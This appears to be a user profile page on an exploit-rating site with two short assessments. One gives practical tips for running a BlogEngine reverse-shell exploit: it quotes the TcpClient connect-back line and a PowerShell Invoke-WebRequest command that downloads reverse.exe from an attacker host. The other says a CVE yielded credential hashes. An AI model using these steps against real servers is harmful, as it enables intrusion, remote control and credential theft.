Leafry (7)

Last Login: February 11, 2021
Assessments
2
Score
7

Leafry's Contributions (2)

3
Ratings
Technical Analysis

This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.

Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", $LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server, or the reverse shell would hang up in some terminal windows but not others; this exploit creates a very unstable shell.
-The script should be named PostView.ascx

Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. -> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe

2
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
Technical Analysis

This exploit is ok. When running on my attack box, I had to modify the code. Not the worst case. Just a few commands threw syntax errors. In the end, the CVE was able to provide a salt and hash that gave me credentials to get into the box.